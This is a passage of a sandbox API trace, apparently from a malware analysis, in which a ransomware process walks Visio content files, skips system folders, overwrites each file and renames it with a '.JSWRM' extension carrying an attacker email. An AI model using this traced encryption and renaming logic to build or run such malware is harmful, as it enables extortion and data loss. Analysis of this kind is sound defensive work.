cAlternateFileName="DRAWTL~2.VSS")) returned 1 [0147.559] lstrcmpiW (lpString1="DRAWTL_U.VSSX", lpString2=".") returned 1 [0147.559] lstrcmpiW (lpString1="DRAWTL_U.VSSX", lpString2="..") returned 1 [0147.559] lstrcmpiW (lpString1="DRAWTL_U.VSSX", lpString2="...") returned 1 [0147.559] lstrcmpiW (lpString1="DRAWTL_U.VSSX", lpString2="windows") returned -1 [0147.559] lstrcmpiW (lpString1="DRAWTL_U.VSSX", lpString2="recovery") returned -1 [0147.559] lstrcmpiW (lpString1="DRAWTL_U.VSSX", lpString2="perflogs") returned -1 [0147.560] lstrcmpiW (lpString1="DRAWTL_U.VSSX", lpString2="documents and settings") returned 1 [0147.560] lstrcmpiW (lpString1="DRAWTL_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.560] lstrcmpiW (lpString1="DRAWTL_U.VSSX", lpString2="system volume information") returned -1 [0147.560] lstrcmpiW (lpString1="DRAWTL_U.VSSX", lpString2="msocache") returned -1 [0147.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRAWTL_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRAWTL_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DRAWTL_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRAWTL_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRAWTL_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DRAWTL_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.560] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DRAWTL_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\drawtl_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.561] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=79623) returned 1 [0147.561] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.562] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x13700, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x13700, lpOverlapped=0x0) returned 1 [0147.569] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.569] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x13700, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x13700, lpOverlapped=0x0) returned 1 [0147.570] CloseHandle (hObject=0x314) returned 1 [0147.570] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DRAWTL_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\drawtl_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DRAWTL_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\drawtl_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.571] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1ec2a6a, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1ec2a6a, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1ec2a6a, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x59d5, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DRILLD_M.VSSX", cAlternateFileName="DRILLD~2.VSS")) returned 1 [0147.571] lstrcmpiW (lpString1="DRILLD_M.VSSX", lpString2=".") returned 1 [0147.571] lstrcmpiW (lpString1="DRILLD_M.VSSX", lpString2="..") returned 1 [0147.571] lstrcmpiW (lpString1="DRILLD_M.VSSX", lpString2="...") returned 1 [0147.571] lstrcmpiW (lpString1="DRILLD_M.VSSX", lpString2="windows") returned -1 [0147.571] lstrcmpiW (lpString1="DRILLD_M.VSSX", lpString2="recovery") returned -1 [0147.571] lstrcmpiW (lpString1="DRILLD_M.VSSX", lpString2="perflogs") returned -1 [0147.571] lstrcmpiW (lpString1="DRILLD_M.VSSX", lpString2="documents and settings") returned 1 [0147.571] lstrcmpiW (lpString1="DRILLD_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.571] lstrcmpiW (lpString1="DRILLD_M.VSSX", lpString2="system volume information") returned -1 [0147.571] lstrcmpiW (lpString1="DRILLD_M.VSSX", lpString2="msocache") returned -1 [0147.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRILLD_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRILLD_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DRILLD_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRILLD_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRILLD_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DRILLD_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DRILLD_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\drilld_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.573] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=22997) returned 1 [0147.573] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.573] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x59d0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x59d0, lpOverlapped=0x0) returned 1 [0147.579] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.579] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x59d0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x59d0, lpOverlapped=0x0) returned 1 [0147.579] CloseHandle (hObject=0x314) returned 1 [0147.580] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DRILLD_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\drilld_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DRILLD_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\drilld_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.581] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a459ce, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a459ce, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a459ce, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xb877, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DRILLD_M.VSTX", cAlternateFileName="DRILLD~2.VST")) returned 1 [0147.581] lstrcmpiW (lpString1="DRILLD_M.VSTX", lpString2=".") returned 1 [0147.581] lstrcmpiW (lpString1="DRILLD_M.VSTX", lpString2="..") returned 1 [0147.581] lstrcmpiW (lpString1="DRILLD_M.VSTX", lpString2="...") returned 1 [0147.581] lstrcmpiW (lpString1="DRILLD_M.VSTX", lpString2="windows") returned -1 [0147.581] lstrcmpiW (lpString1="DRILLD_M.VSTX", lpString2="recovery") returned -1 [0147.581] lstrcmpiW (lpString1="DRILLD_M.VSTX", lpString2="perflogs") returned -1 [0147.581] lstrcmpiW (lpString1="DRILLD_M.VSTX", lpString2="documents and settings") returned 1 [0147.581] lstrcmpiW (lpString1="DRILLD_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.581] lstrcmpiW (lpString1="DRILLD_M.VSTX", lpString2="system volume information") returned -1 [0147.581] lstrcmpiW (lpString1="DRILLD_M.VSTX", lpString2="msocache") returned -1 [0147.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRILLD_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRILLD_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DRILLD_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRILLD_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRILLD_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DRILLD_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DRILLD_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\drilld_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.582] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=47223) returned 1 [0147.582] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.582] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xb870, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xb870, lpOverlapped=0x0) returned 1 [0147.587] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.587] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xb870, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xb870, lpOverlapped=0x0) returned 1 [0147.587] CloseHandle (hObject=0x314) returned 1 [0147.587] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DRILLD_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\drilld_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DRILLD_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\drilld_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.588] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c8663f, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1c8663f, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1c8663f, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x595f, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DRILLD_U.VSSX", cAlternateFileName="DRILLD~1.VSS")) returned 1 [0147.589] lstrcmpiW (lpString1="DRILLD_U.VSSX", lpString2=".") returned 1 [0147.589] lstrcmpiW (lpString1="DRILLD_U.VSSX", lpString2="..") returned 1 [0147.589] lstrcmpiW (lpString1="DRILLD_U.VSSX", lpString2="...") returned 1 [0147.589] lstrcmpiW (lpString1="DRILLD_U.VSSX", lpString2="windows") returned -1 [0147.589] lstrcmpiW (lpString1="DRILLD_U.VSSX", lpString2="recovery") returned -1 [0147.589] lstrcmpiW (lpString1="DRILLD_U.VSSX", lpString2="perflogs") returned -1 [0147.589] lstrcmpiW (lpString1="DRILLD_U.VSSX", lpString2="documents and settings") returned 1 [0147.589] lstrcmpiW (lpString1="DRILLD_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.589] lstrcmpiW (lpString1="DRILLD_U.VSSX", lpString2="system volume information") returned -1 [0147.589] lstrcmpiW (lpString1="DRILLD_U.VSSX", lpString2="msocache") returned -1 [0147.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRILLD_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRILLD_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DRILLD_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRILLD_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRILLD_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DRILLD_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.589] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DRILLD_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\drilld_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.590] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=22879) returned 1 [0147.590] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.590] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5950, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5950, lpOverlapped=0x0) returned 1 [0147.593] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.593] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5950, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5950, lpOverlapped=0x0) returned 1 [0147.593] CloseHandle (hObject=0x314) returned 1 [0147.593] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DRILLD_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\drilld_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DRILLD_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\drilld_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.595] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a459ce, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a459ce, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a459ce, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xb823, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DRILLD_U.VSTX", cAlternateFileName="DRILLD~1.VST")) returned 1 [0147.595] lstrcmpiW (lpString1="DRILLD_U.VSTX", lpString2=".") returned 1 [0147.595] lstrcmpiW (lpString1="DRILLD_U.VSTX", lpString2="..") returned 1 [0147.595] lstrcmpiW (lpString1="DRILLD_U.VSTX", lpString2="...") returned 1 [0147.595] lstrcmpiW (lpString1="DRILLD_U.VSTX", lpString2="windows") returned -1 [0147.595] lstrcmpiW (lpString1="DRILLD_U.VSTX", lpString2="recovery") returned -1 [0147.595] lstrcmpiW (lpString1="DRILLD_U.VSTX", lpString2="perflogs") returned -1 [0147.595] lstrcmpiW (lpString1="DRILLD_U.VSTX", lpString2="documents and settings") returned 1 [0147.595] lstrcmpiW (lpString1="DRILLD_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.595] lstrcmpiW (lpString1="DRILLD_U.VSTX", lpString2="system volume information") returned -1 [0147.595] lstrcmpiW (lpString1="DRILLD_U.VSTX", lpString2="msocache") returned -1 [0147.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRILLD_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRILLD_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DRILLD_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRILLD_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRILLD_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DRILLD_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DRILLD_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\drilld_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.597] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=47139) returned 1 [0147.597] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.597] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xb820, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xb820, lpOverlapped=0x0) returned 1 [0147.602] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.602] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xb820, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xb820, lpOverlapped=0x0) returned 1 [0147.603] CloseHandle (hObject=0x314) returned 1 [0147.603] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DRILLD_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\drilld_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DRILLD_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\drilld_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.604] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c3a235, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1c3a235, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1c3a235, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x2faec, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DTLNET_M.VSSX", cAlternateFileName="DTLNET~1.VSS")) returned 1 [0147.604] lstrcmpiW (lpString1="DTLNET_M.VSSX", lpString2=".") returned 1 [0147.604] lstrcmpiW (lpString1="DTLNET_M.VSSX", lpString2="..") returned 1 [0147.604] lstrcmpiW (lpString1="DTLNET_M.VSSX", lpString2="...") returned 1 [0147.604] lstrcmpiW (lpString1="DTLNET_M.VSSX", lpString2="windows") returned -1 [0147.604] lstrcmpiW (lpString1="DTLNET_M.VSSX", lpString2="recovery") returned -1 [0147.604] lstrcmpiW (lpString1="DTLNET_M.VSSX", lpString2="perflogs") returned -1 [0147.604] lstrcmpiW (lpString1="DTLNET_M.VSSX", lpString2="documents and settings") returned 1 [0147.604] lstrcmpiW (lpString1="DTLNET_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.604] lstrcmpiW (lpString1="DTLNET_M.VSSX", lpString2="system volume information") returned -1 [0147.604] lstrcmpiW (lpString1="DTLNET_M.VSSX", lpString2="msocache") returned -1 [0147.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DTLNET_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 